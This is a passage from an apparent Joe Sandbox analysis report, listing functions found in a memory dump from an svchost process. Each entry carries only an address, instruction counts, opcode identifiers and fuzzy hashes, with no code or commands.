                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                                                  • Instruction ID: 29cf7b95959cb53ef771d741ea14790b2013baa10a1e5108de3038f28e2ed88c
                                                                                                                  • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                                                  • Instruction Fuzzy Hash: CB218B72200300DFD71DDF15C445B6ABBE9EF95365F15816DE90ACF2A0EBB0E981CA98
                                                                                                                  Function 03CB06F1 Relevance: .1, Instructions: 79COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 15fe22c4be1af1df33c71f673afd3974a7749117fae023c999d5ed66929e9545
                                                                                                                  • Instruction ID: d7283b03f35e924db2df2c6e24135d421fbaf87d967c32e58724f6b9ea097bd5
                                                                                                                  • Opcode Fuzzy Hash: 15fe22c4be1af1df33c71f673afd3974a7749117fae023c999d5ed66929e9545
                                                                                                                  • Instruction Fuzzy Hash: 70216D759002299BCB14DF59C881ABEB7F4FF48740F550069E941FB240D778AD52DBA0
                                                                                                                  Function 03CB019F Relevance: .1, Instructions: 78COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9744420570fce007874bcda90de243c8342e87d9105de1592d7264e6eec7ffc3
                                                                                                                  • Instruction ID: c8578b5c295a74410eb680d76ddedd4b50a501c69545903d37b65a6312dd23d8
                                                                                                                  • Opcode Fuzzy Hash: 9744420570fce007874bcda90de243c8342e87d9105de1592d7264e6eec7ffc3
                                                                                                                  • Instruction Fuzzy Hash: BF21DE75600654AFC715DB68C840F6AB7B8FF88740F140069F944DB7A0D738ED10CBA8
                                                                                                                  Function 03C69660 Relevance: .1, Instructions: 78COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ead08c21cb16d6130dfdea628e28c9e78456552765509942e8feda2f64c1f53f
                                                                                                                  • Instruction ID: ffe5c17f2c318b0886737f139f23cd58459aea9f4bdea4820008e1001b50bff9
                                                                                                                  • Opcode Fuzzy Hash: ead08c21cb16d6130dfdea628e28c9e78456552765509942e8feda2f64c1f53f
                                                                                                                  • Instruction Fuzzy Hash: 7E213831200B05DBCF71EB29CC80B26B7A6FB51228F184659E893CE6E0D731E951DB95
                                                                                                                  Function 03CB0283 Relevance: .1, Instructions: 74COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e6482c83a5375706eece5e1d2e47599cdc49c405468767ec440393c90a1c442e
                                                                                                                  • Instruction ID: 3b14ed062cd254d373e38a403371b65222d070d7e71b8cb56929cc2b975137b5
                                                                                                                  • Opcode Fuzzy Hash: e6482c83a5375706eece5e1d2e47599cdc49c405468767ec440393c90a1c442e
                                                                                                                  • Instruction Fuzzy Hash: 7E21B0729043959BC711EFAAC848BABF7ECBF81240F094556BC90CB251D734DA48C6A2
                                                                                                                  Function 03D001AA Relevance: .1, Instructions: 71COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7c026277872cc5e0963f605c228b607be8d88f840ed5543f7cdc629beb2de6ff
                                                                                                                  • Instruction ID: a1c996ebf0ed2adea8d9f8302c7b6fd04acadb1d4cad8cc842706384d237f455
                                                                                                                  • Opcode Fuzzy Hash: 7c026277872cc5e0963f605c228b607be8d88f840ed5543f7cdc629beb2de6ff
                                                                                                                  • Instruction Fuzzy Hash: A1210A712041905FDB45CB6A88F45B6BFE6EFC6215B0D82E6D984CB342C134D907C7A0
                                                                                                                  Function 03C6A30B Relevance: .1, Instructions: 70COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 89bf6f1ecdc4212d89704b192355920728476dbc43691453b374e4ba4c73497a
                                                                                                                  • Instruction ID: 27f5c82a5565e25999382ea02ce03eb21b1b659c17bf4b97bf2483c41d70d944
                                                                                                                  • Opcode Fuzzy Hash: 89bf6f1ecdc4212d89704b192355920728476dbc43691453b374e4ba4c73497a
                                                                                                                  • Instruction Fuzzy Hash: 4521AC79200B519FC724EF29C840B46B7F5AF98748F1884A8A909CB761E331E952CB94
                                                                                                                  Function 03C2B765 Relevance: .1, Instructions: 69COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: a7ace08162457ef1d1688df378132f1a424b8f415785b167d21276fd43c0b749
                                                                                                                  • Instruction ID: 5ce891571dc98ddac613f3b2bdf130e431b4938c489665424d675ac60399bc73
                                                                                                                  • Opcode Fuzzy Hash: a7ace08162457ef1d1688df378132f1a424b8f415785b167d21276fd43c0b749
                                                                                                                  • Instruction Fuzzy Hash: 51216936100B50DFC721EF68CA41F19BBB5FF18748F1A4968E40ADBAA1C734E910EB44
                                                                                                                  Function 03CFEE26 Relevance: .1, Instructions: 69COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b626cd1ebd66efe2a1d26ed84b0573245269cba7ffd092eba36f048cde0aaa41
                                                                                                                  • Instruction ID: b42c0aaecd9f2253f29cbe90bc64f7fa5d9f73646468e13c0eddc4bf6e898cbb
                                                                                                                  • Opcode Fuzzy Hash: b626cd1ebd66efe2a1d26ed84b0573245269cba7ffd092eba36f048cde0aaa41
                                                                                                                  • Instruction Fuzzy Hash: B621B433A104119F9B18CF3DD804466F7F6EFDC31436A427AD912DB268D770BD118A84
                                                                                                                  Function 03C60124 Relevance: .1, Instructions: 68COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                  • Instruction ID: 79f3aaedb7a8b465795239431ecbc90d82aac5a3843aa8395792b261d8fb5681
                                                                                                                  • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                  • Instruction Fuzzy Hash: C311EF76604714BFD722DF85CC80FAABBB8EB80754F150029EA01EF180D676EE44DB60
                                                                                                                  Function 03C38770 Relevance: .1, Instructions: 68COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0e51d3cc6a95cbc97f25b591a414704ff124dfc185160a38a2752dfef3afbfd8
                                                                                                                  • Instruction ID: 8cb1c64f987e00113935c51753b20611786dd810b9ca04f982739bc253d2492e
                                                                                                                  • Opcode Fuzzy Hash: 0e51d3cc6a95cbc97f25b591a414704ff124dfc185160a38a2752dfef3afbfd8
                                                                                                                  • Instruction Fuzzy Hash: 99119D366007209BCB11CF59C480A6AF7EAAF4B750B198069FD08DF205D6B2EA0587A0
                                                                                                                  Function 03C33720 Relevance: .1, Instructions: 67COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c00b2979cee78422589e73190f40291aa602f1b522ef73cb05ca76f8117a8cf3
                                                                                                                  • Instruction ID: 34bf41746177b0029fa73b41e0f700f485751f5745eabdb2579ea796fd50c5d4
                                                                                                                  • Opcode Fuzzy Hash: c00b2979cee78422589e73190f40291aa602f1b522ef73cb05ca76f8117a8cf3
                                                                                                                  • Instruction Fuzzy Hash: A8210779A003488BE725DF5DC5487EDB7B4FB8A318F2D8018C811DB2D0CBB89A45CB50
                                                                                                                  Function 03C380E9 Relevance: .1, Instructions: 66COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 30dcca66137ef2276ed95199b2e6707e49d37b17252db808dc964d1e8b2b7be8
                                                                                                                  • Instruction ID: 84826ca0f325f18bf7fd52bfbd9749b84de35f61435ddb4f8250a0f006d6b03b
                                                                                                                  • Opcode Fuzzy Hash: 30dcca66137ef2276ed95199b2e6707e49d37b17252db808dc964d1e8b2b7be8
                                                                                                                  • Instruction Fuzzy Hash: A0215E75A00205DFCB14CF99C581AAEBBB5FB89314F24416DE105EB350C772AE0ACBD0
                                                                                                                  Function 03C6674D Relevance: .1, Instructions: 65COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 148937d03ba7c441f10769c27e4fda6e5432889d6a4c8982593179ba9f6183ae
                                                                                                                  • Instruction ID: 845c494c502a3506b526fce0f5a4d5dc361e75d4b006c9b5069de135b4ec27fe
                                                                                                                  • Opcode Fuzzy Hash: 148937d03ba7c441f10769c27e4fda6e5432889d6a4c8982593179ba9f6183ae
                                                                                                                  • Instruction Fuzzy Hash: 69215675611B00EFC720DF69C881B66B3F8FF84250F44882DE5AACB650DA70AD60DBA0
                                                                                                                  Function 03C29240 Relevance: .1, Instructions: 64COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c85dae548149101cf856714e7dff0bc2c8dfbb6b59ab697cc238b8eb4ce4dc0f
                                                                                                                  • Instruction ID: d6501194c4f197e5688c8505e78efc7c54c0b4032946b35b9c91651946f318dd
                                                                                                                  • Opcode Fuzzy Hash: c85dae548149101cf856714e7dff0bc2c8dfbb6b59ab697cc238b8eb4ce4dc0f
                                                                                                                  • Instruction Fuzzy Hash: 2211E27F010640EAD730FF56D901A727BA8EBB4B84F144065E800DB358E738DE01CB64
                                                                                                                  Function 03C666B0 Relevance: .1, Instructions: 61COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 32755500ce7151faa8850d394bd09d3b4547de4b35fd8aad6018725e3309bbe7
                                                                                                                  • Instruction ID: 7b6e3cd28f0ba25faa3acc23b8e4be216cb1aa7f326c0eafae0b4d01cd0efe48
                                                                                                                  • Opcode Fuzzy Hash: 32755500ce7151faa8850d394bd09d3b4547de4b35fd8aad6018725e3309bbe7
                                                                                                                  • Instruction Fuzzy Hash: 6F11CE76A01344EFCB24DF59D5C0A5ABBE8EF94650F1A8079E905DF310DA70DE10CBA0
                                                                                                                  Function 03CFFF09 Relevance: .1, Instructions: 60COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5f629486d06ba5293cea0ab9bc75405e88b7907b4448fe1dd98bdb4fd1b5a73e
                                                                                                                  • Instruction ID: 499c63169c64a662fd5881d3787f5bd2fa1a97c018c6ec8bba0f0120fbf4f6eb
                                                                                                                  • Opcode Fuzzy Hash: 5f629486d06ba5293cea0ab9bc75405e88b7907b4448fe1dd98bdb4fd1b5a73e
                                                                                                                  • Instruction Fuzzy Hash: 722152B2A502059FD754DF2AE884A42BBF5FB5D210B8585BAE90CCF24AE770D844CB90
                                                                                                                  Function 03C527ED Relevance: .1, Instructions: 58COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 914b6323b2efa39914e25e9993f52a19d517a3f8de8c3e0d3f59ceec9a00deac
                                                                                                                  • Instruction ID: 216285a4be265a4151c83fff3c8e58c0bd757b409737cee5fba9f7763617fca9
                                                                                                                  • Opcode Fuzzy Hash: 914b6323b2efa39914e25e9993f52a19d517a3f8de8c3e0d3f59ceec9a00deac
                                                                                                                  • Instruction Fuzzy Hash: 3D01043B605684ABE316E2AA9888F27B6DCEF80354F0A0465F800CF641DA14DC00C2A5
                                                                                                                  Function 03C5B052 Relevance: .1, Instructions: 57COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fd725b15f23d3c654f1db45f53ca4294ed68f3d55b07656975ebf8e0ad7d5a23
                                                                                                                  • Instruction ID: fc9ceae544f2f69cfe9e299b11b543f30f60e535ea48e82adb84b581e6f3c20e
                                                                                                                  • Opcode Fuzzy Hash: fd725b15f23d3c654f1db45f53ca4294ed68f3d55b07656975ebf8e0ad7d5a23
                                                                                                                  • Instruction Fuzzy Hash: 3901D6B6B04300ABD710EBBA9C81F6BBAF8EFD4314F050029FA05CB141EA70ED409625
                                                                                                                  Function 03CED6F0 Relevance: .1, Instructions: 57COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                                                                                  • Instruction ID: dc3f8c2c1362fd67af51a53ea278b205c6cab8a5bfdb9df6a0b0d0b4cd7c1785
                                                                                                                  • Opcode Fuzzy Hash: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                                                                                  • Instruction Fuzzy Hash: 43018479700209BF9B15DBA6CA88DAFBBBDEF85A44F050059B916D7204E730EE41E760
                                                                                                                  Function 03C34690 Relevance: .1, Instructions: 57COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 01afa505e28cd14948947aa6840df5776a4f49f4f9ec82641f0da71e55f4fb20
                                                                                                                  • Instruction ID: f8b6084924b56ee8d7609ecbc636c3716a98a344a08e3090609cf79bae5b3686
                                                                                                                  • Opcode Fuzzy Hash: 01afa505e28cd14948947aa6840df5776a4f49f4f9ec82641f0da71e55f4fb20
                                                                                                                  • Instruction Fuzzy Hash: 7611AC3A240744AFCB29CF5BD944F56BBA8EB87B65F094129F814CB290C770E940CFA0
                                                                                                                  Function 03C66620 Relevance: .1, Instructions: 56COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ff6f645621d250429901080fa664ef9ac12e00f96d4a3c2267f48f95efd7be33
                                                                                                                  • Instruction ID: e6662d27676f65cdc559cda05f0d0d5f4858f5d6df78709724b84abd465faf1c
                                                                                                                  • Opcode Fuzzy Hash: ff6f645621d250429901080fa664ef9ac12e00f96d4a3c2267f48f95efd7be33
                                                                                                                  • Instruction Fuzzy Hash: 1011E17AA00715ABCB22EF69E9C0B5EF7B8EF84740F550058E901EB200D730EE119BA0
                                                                                                                  Function 03C27330 Relevance: .1, Instructions: 55COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a0371805163a40142a9f72563d0aa0a5c150e96b9a39e8d289908fb4be0fdd2d
                                                                                                                  • Instruction ID: 2ae2489ecaebfc5c11f32dcfd6ccb97e431c896b7b84a3b0d3d0a398ed5fcdb6
                                                                                                                  • Opcode Fuzzy Hash: a0371805163a40142a9f72563d0aa0a5c150e96b9a39e8d289908fb4be0fdd2d
                                                                                                                  • Instruction Fuzzy Hash: 0E11AC72600724AFD721CF69C881FABBBE8EB44304F054829EA85CB212D735ED00DBA1
                                                                                                                  Function 03C5F2D0 Relevance: .1, Instructions: 54COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 11ce686bd11a5fa5cb7ab0631f49d35a5637918a498c97c399594c2f9427d430
                                                                                                                  • Instruction ID: 16e4867f3e562df9697a317669eceea4c055549a5c88e6fc18961f411820a10b
                                                                                                                  • Opcode Fuzzy Hash: 11ce686bd11a5fa5cb7ab0631f49d35a5637918a498c97c399594c2f9427d430
                                                                                                                  • Instruction Fuzzy Hash: CC11E575600B48DBD720DF69C844FAEBBA8FF44704F19047AE901EB241D679DA41D754
                                                                                                                  Function 03CC72A0 Relevance: .1, Instructions: 53COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                                                                  • Instruction ID: 6a05246b6a382eb46d89766d2c4463d9ade8907ebe2c8031bcbf153992ac6fd7
                                                                                                                  • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                                                                  • Instruction Fuzzy Hash: 6E01D27A240645BFD711EF16CC84E62F76DFF84391B054929F510CA560C721ACA0DAA4
                                                                                                                  Function 03C2A250 Relevance: .1, Instructions: 52COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                  • Instruction ID: 12d3bba0c3323fe33c34916dca6f41ee620892b90c576c09fb6824eb1a21bf24
                                                                                                                  • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                  • Instruction Fuzzy Hash: 1B01C475505721ABCB20CF159840A26BFA9EB45760705896DFC99CF680DB35E520DB60
                                                                                                                  Function 03C36259 Relevance: .1, Instructions: 51COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d0ecdaad664d8ff89e5926c856896195afe6d87bc18b8b5a58e1d7f565c06378
                                                                                                                  • Instruction ID: 81856130d4f43588c913eb7038bbca9c8ca3bdd32b3c4722dd8931433d9c472a
                                                                                                                  • Opcode Fuzzy Hash: d0ecdaad664d8ff89e5926c856896195afe6d87bc18b8b5a58e1d7f565c06378
                                                                                                                  • Instruction Fuzzy Hash: 5C11AC75601328ABDB25EB24CC82FE8B378EF04710F5145D4A729EA0E0DB70AE91DF84
                                                                                                                  Function 03C3208A Relevance: .0, Instructions: 50COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                  • Instruction ID: 0e3e33b9c58b64cf344593abda0f1ef420995afa2fc3a8f9efe2aacf16f29114
                                                                                                                  • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                  • Instruction Fuzzy Hash: 5C0128322002108BDF10EA19D880BA6B76AFFC5700F1948A9ED01CF245DA71D981C790
                                                                                                                  Function 03C720F0 Relevance: .0, Instructions: 49COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7ad1ffe8fa98f707b3ec4cc401a234f4a422d2a36de740bad065b07e23b35998
                                                                                                                  • Instruction ID: ce5cbd2998507796487dc0ada1acb510b6b50e439d050d7d25cbbb0b8fa4f379
                                                                                                                  • Opcode Fuzzy Hash: 7ad1ffe8fa98f707b3ec4cc401a234f4a422d2a36de740bad065b07e23b35998
                                                                                                                  • Instruction Fuzzy Hash: 62116D35A0020DEBDB05EFA5C850EAE7BB9FB44244F004059ED12DB250D635EE11DB90
                                                                                                                  Function 03C2C020 Relevance: .0, Instructions: 49COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
